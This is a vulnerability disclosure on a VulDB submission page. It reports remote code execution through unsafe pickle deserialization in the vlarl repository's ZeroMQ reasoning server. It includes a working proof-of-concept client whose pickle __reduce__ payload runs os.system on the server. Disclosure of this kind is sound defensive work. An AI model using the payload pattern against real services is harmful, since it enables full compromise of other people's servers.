إرسال #653279: vlarl latest Insecure Deserialization(leads to Remote Code Execution)المعلومات

عنوان	vlarl latest Insecure Deserialization(leads to Remote Code Execution)
الوصف	# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server` ### Summary A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them using `pickle.loads`, which allows attackers to execute arbitrary code on the host system. ### Details The vulnerable code is located at:[experiments.robot.bridge.reasoning_server::run_reasoning_server]( https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86) The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`: ```python while True: message = socket.recv() inputs = pickle.loads(message) # Unsafe deserialization result = model.raw_generate(inputs) socket.send(pickle.dumps(result)) ``` `pickle` is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization. ### Proof of Concept (PoC) 1. Start the vulnerable server: ```shell PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py ``` 2. Run the following client code to send a malicious payload: ```python import pickle, zmq class Payload(object): def __reduce__(self): import os return (os.system, ('echo "hacked"',)) context = zmq.Context() socket = context.socket(zmq.REQ) socket.connect("tcp://127.0.0.1:5623") socket.send(pickle.dumps(Payload())) ``` 3. The server will execute `os.system('echo "hacked"')`, demonstrating remote code execution. ### Impact - Attackers can remotely execute arbitrary system commands, leading to full server compromise. - This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure. ### Recommendation - Never use `pickle.loads` on data from untrusted sources.* - Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs. ### References - [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
المصدر	⚠️ https://github.com/GuanxingLu/vlarl/issues/18
المستخدم	zznQ (UID 64000)
ارسال	12/09/2025 07:58 AM (7 أشهر منذ)
الاعتدال	25/09/2025 04:12 PM (13 days later)
الحالة	تمت الموافقة
إدخال VulDB	325846 [GuanxingLu vlarl حتى 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server رسالة تجاوز الصلاحيات]
النقاط	20

التالي ▸نظرة عامة ◂ السابق

Do you know our Splunk app?

Download it now for free!